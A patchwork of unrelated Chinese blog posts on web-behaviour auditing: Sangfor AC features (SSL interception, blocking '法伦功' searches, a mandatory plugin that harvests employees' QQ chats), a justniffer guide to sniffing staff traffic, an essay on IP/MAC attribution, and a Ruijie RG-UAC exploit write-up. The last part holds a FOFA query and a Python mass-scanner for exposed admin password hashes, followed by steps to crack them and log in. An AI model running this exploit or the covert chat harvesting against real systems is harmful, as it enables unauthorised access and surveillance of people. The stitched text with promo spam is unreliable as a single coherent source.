内容审计知识点目录
1.上网行为审计架构
2.上网行为审计技术
2.1日志中心
2.2日志查询
2.3统计分析
2.4报表中心
3.外发邮件审计技术
3.1需求背景
3.2外发邮件审计原理
4.SSL内容解密技术
4.1SSL解密技术原理
4.2SSL内容识别配置
4.3效果显示
5.WEB关键字过滤技术
5.1需求背景
5.2解决思路
6.IM聊天内容审计技术
6.1需求背景
6.2实现方式
6.3效果显示
6.4总结

1.上网行为审计架构

2.上网行为审计技术
2.1日志中心
上网行为监控 这个模块，可以实时的看到一 些“拒绝”或者“被记录”的上网动作，那么如果想查以前的日志，候就需要登录到日志中心去查看历史日志。


2.2日志查询

查询模块，提供给管理员进行日志查询的功能，包含所有行为查询、访问 网站查询、即时聊天日志查询、邮件、发帖、发微博等日志查询，能够追查到各种违反组织规定的行为。



这个模块可以查询到所有的行为日志，但是不会显示行为内容

可以根据指定时间、用户、组、应用来查询日志 下图是查询所有行为日志截图：



也可以过滤其他的一些参数进行查询，如下图：



2.3统计分析

主要满足客户的流量分析、时长分析、用户行为分析、合规性分析等需求。

例如：统计应用流量排行



可以快速的自动生成精美的图标呈现出来，并且可以自由切换不同风格的表格



2.4报表中心

客户可订阅指定的报表内容，将订阅的内容上报到指定的邮箱进行审阅；

满足客户流量时长分析、用户行为分析、合规性分析等需求



3.外发邮件审计技术
3.1需求背景
审计论坛发帖、网页发送邮件的内容


3.2外发邮件审计原理

首先用新浪邮箱发送封邮件，同时抓包，下图是发送的邮件内容：



新浪发邮件数据包内容



然后在抓取一个163邮箱发邮件的数据包



两个数据包对比
1、数据包的内容格式完全不一样，参数也不一样。
2、相同之处就是这两个邮箱都是以明文方式发送的。

4.SSL内容解密技术
4.1SSL解密技术原理


在没开启SSL内容识别的情况下，打开https://mail.qq.com，对比开启SSL内 容识别的情况下

正常情况下：



开启SSL内容识别后：


4.2SSL内容识别配置

1、需要先确认多功能序列号已激活SSL内容识别，默认是激活的。 如下图：



2、配置SSL内容识别，填写需要被识别的网站URL



4.3效果显示

使用QQ邮箱发送个邮件





5.WEB关键字过滤技术
5.1需求背景

客户需求：

1、内网用户全天拒绝外发含有“法伦功”关键字的贴子/邮件/微博，

2、同时禁止通过搜索引擎搜索含有“法伦功”关键字的内容

3、禁止上传ppt、doc、这些类型文件到网络

5.2解决思路

1、通过上网权限策略的“web关键字过滤”来禁止通过搜索引擎搜索“法 伦功”

2、通过上网权限策略的“HTTP上传”来拒绝外发含“法伦功”关键字的 贴子/邮件/微博





注意： 
1、“web”关键字过滤只能针对网页版邮箱过滤 
2、如果网站是https的，需要开启SSL内容识别，并且添加对应的URL

“邮件过滤”功能只针对客户端邮件方式生效，对于WEB MAIL不生效

3、禁止上传ppt、doc、这些类型文件通过“web文件类型过滤”来实现



6.IM聊天内容审计技术
6.1需求背景

QQ客户端聊天内容在网络上是通过OICQ协议传输的，内容是加密的，这种数据 业界都没有办法解密。



如果客户想审计员工的QQ聊天记录，怎么实现？

6.2实现方式

SANGFOR通过插件方式，在客户端电脑自动找到QQ聊天内容缓存到本地的数据库中，然后AC每隔10s在客户端的数据库读取聊天内容，写入到AC的日志中心。

所以如果需要审计QQ聊天容，就需要每台电脑都安装准入插件。

AC可以通过策略来统一下发安装，配置如下：



策略配置好后，客户端打开网页就会提示这个准入安装页面，如果不安装是没 办法继续上网的。



6.3效果显示

然后在数据中心即可查询到QQ聊天内容



6.4总结
既然准入程序是exe格式，那手机可以安装吗？

准入系统只支持在windows pc上安装，如果是非windows pc启用了准入， 则无法安装准入客户端插件，也无法上网。 如果对全网用户启用了准入策略，则内网有非windows pc（如手机或平板） 要求经过AC可以上网，可以通过下面的准入故障排除实现。

分享一下我老师大神的人工智能教程！零基础，通俗易懂！http://blog.csdn.net/jiangjunshow
也欢迎大家转载本篇文章。分享知识，造福人民，实现我们中华民族伟大复兴！
                
来源ispublic.com
Google上貌似找不到利用开源软件实现上网行为审计的文章——这也难怪，开源在国内并不流行，而上网行为审计在国外也不流行。不过这并不代表不能实现，IS in Public通过本文提供一种利用开源嗅探工具与脚本实现轻量级上网行为审计的思路与方法。
实施条件：
服务器一台：
流量越大性能要求要高，远程管理需要双网卡，若果有大量的数据必须写入磁盘，建议RAID0/RAID10;
交换机镜像口：
存在条件将所有需要审计的网络流向镜像给行为审计服务器；
软件环境：
操作系统             CentOS5.5-i386
审计工具             Justniffer0.5.7
依赖关系             boost1.33.1
                             libpcap0.9.4
                             libnet1.1.2.1
                             libnids1.24
                             gcc4.1.2(仅在编译时有用)
实施步骤
1.安装操作系统：
为日志保存路径建立分区，若数据量较大且条件允许，最好能做RAID0或者RAID10；
仅需安装以下组件：
        Applications
                 Editors
                 Text-based Internet
        Development
                 Development Libraries
                 Development Tools
        Base System
                 Base
2.安装libpcap
#yum -y install libpcap-devel
若编译安装
#./configure#make#make install
3.安装libnet
#yum -y install libnet
若编译安装
#./configure#make#make install
4.安装justniffer
#tar zxvf justniffer_0.5.7.tar.gz#cd justniffer-0.5.7#./configure#make#make install
假定镜像口连接到eth0，执行以下命令看是否能抓到包：
#justniffer -i eth0 -r
如果屏幕有信息显示则说明安装成功。
开始审计
Justniffer目前支持的协议有： HTTP, JDBC, RTSP, SIP, SMTP, IMAP, POP, LDAP。对我们最有价值的可能是HTTP和SMTP，即网页浏览与邮件发送。至于IM信息，不建议过多考虑，毕竟大多数IM软件（如QQ）都已自行加密，而且MSN也有MSNSHELL和各种插件。
如果仅仅需要监视员工浏览了哪些URL，建议使用命令：
#justniffer -i eth0 -p "port 80" -l "%request.timestamp(%F %T) %source.ip /%dest.ip %request.header.host %request.url %request.header.referer%newline"/>> /var/log/httpmonitor
如果需要监视包括员工发帖记录在内的一些详细信息，建议使用命令：
#justniffer -i eth0 -p "port 80" -l "%request.timestamp(%F %T) %source.ip /%dest.ip%newline%request" >> /var/log/httpmonitor
如果需要监视员工发送的邮件（不包括邮件收取和web访问方式），可使用命令：
#justniffer -i eth0 -p "port 25" -r >> /var/log/mailmonitor
详细的justniffer命令参数请参考官方网站。
中文问题
一个比较令人头疼的问题是中文的编码问题，不过像百度贴吧、天涯这些网站对发帖中的中文都使用了URI编码。一个用perl将URI编码的参数转换成中文的例子：
#!/usr/bin/perl
#From Tsing of ispublic.com
use URI::Escape;
$content=uri_unescape($ARGV[0]);
print "$content/n";
先写到这，之后有空再写几个用于大型企业部署的脚本。
 
            
给我老师的人工智能教程打call！http://blog.csdn.net/jiangjunshow

          

上网行为审计类系统作为安全内容管理类的一个主要分支，对审计数据进行追踪溯源是该类系统的一个主要功能之一，尽管很多审计类系统都宣称能够对各种事件进行准确的全程跟踪定位，但最终定位到什么程度值得商榷。<?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" />

上网行为审计系统记录的信息都算是历史数据，其部署方式大多采用旁路监听，由于其特殊的部署位置，其记录的原始数据包中的MAC地址多数都因路由转发而替换成了网络设备的MAC地址，即IP和MAC地址是无法真实对应的，因此多数上网行为审计类系统的原始数据只能以IP地址进行标识，由于IP地址是可以随意修改的，如果审计系统以IP地址作为事件追踪的主要依据，准确性是无法保证的。

    在用户意识到这个问题之后，上网行为厂商纷纷推出了IP+MAC以及IP+MAC+VLAN ID进行绑定标识的解决方案。但即使如此，IP+MAC也很难作为事件追踪的依据，原因在于MAC地址也容易修改，基于都可修改的IP+MAC来作为事件追踪的依据，准确性也是没有保障的，由此引发“冤假错案”的可能性是很大的，除非还有其他的认证手段进行辅助，如结合用户自身的认证系统或建立一套可信的认证系统。 

    事实上，多数用户在部署上网行为审计类系统时，没有采用认证系统进行辅助，很多审计系统的追踪定位的结果只能是IP地址，或者是IP+MAC地址。所以即使审计系统记录了某个IP在某个时段作了某些违规的事情，如果只是记录了IP，那么“嫌疑人”完全可以说是别人冒用的，如果同时记录了IP和MAC，那么“嫌疑人”也完全可以说是别人冒用或者“克隆”的，要让审计系统发挥追踪溯源的作用，不解决这些问题，审计是不完整的，对用户分析、决策和管理上的支撑作用将打折扣，作为取证的依据就更无从谈起了。

 
				
转载于:https://blog.51cto.com/jeepsen/360684

文章目录
漏洞名称
漏洞编号
漏洞描述
影响版本
FOFA
漏洞复现一（poc）
漏洞复现二
第一步  登录页面
第二步 按F12查看源码,可以发现账号和密码的md5形式
第三步解密md5得到密码
第四步 登录系统
摘抄

漏洞名称

锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露

漏洞编号

CNVD-2021-14536

漏洞描述

锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露,
可以间接获取用户账号密码信息登录后台

影响版本

锐捷RG-UAC统一上网行为管理审计系统

FOFA
title="RG-UAC登录页面"


漏洞复现一（poc）
import requests
import sys
import random
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarning

def title():
    print('+------------------------------------------')

    print('+  \033[34mVersion: 锐捷RG-UAC统一上网行为管理审计系统                             \033[0m')
    print('+  \033[36m使用格式:  python3 poc.py                                            \033[0m')
    print('+  \033[36mFile         >>> ip.txt                             \033[0m')
    print('+------------------------------------------')

def POC_1(target_url):
    vuln_url = target_url
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
    }
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)
        if "super_admin" in response.text and "password" in response.text and response.status_code == 200:
            print("\033[32m[o] 目标 {}存在漏洞 ,F12查看源码获取密码md5值 \033[0m".format(target_url))
        else:
            print("\033[31m[x] 目标 {}不存在漏洞 \033[0m".format(target_url))
    except Exception as e:
        print("\033[31m[x] 目标 {}不存在漏洞 \033[0m".format(target_url))

def Scan(file_name):
    with open(file_name, "r", encoding='utf8') as scan_url:
        for url in scan_url:
            if url[:4] != "http":
                url = "http://" + url
            url = url.strip('\n')
            try:
                POC_1(url)

            except Exception as e:
                print("\033[31m[x] 请求报错 \033[0m".format(e))
                continue

if __name__ == '__main__':
    title()
    file_name  = str(input("\033[35mPlease input Attack File\nFile >>> \033[0m"))
    Scan(file_name)


漏洞复现二
第一步  登录页面

第二步 按F12查看源码,可以发现账号和密码的md5形式

第三步解密md5得到密码

第四步 登录系统

摘抄

长大这件事本身是没有感情色彩的，
为他附上颜色的，是我们。
– 蕊希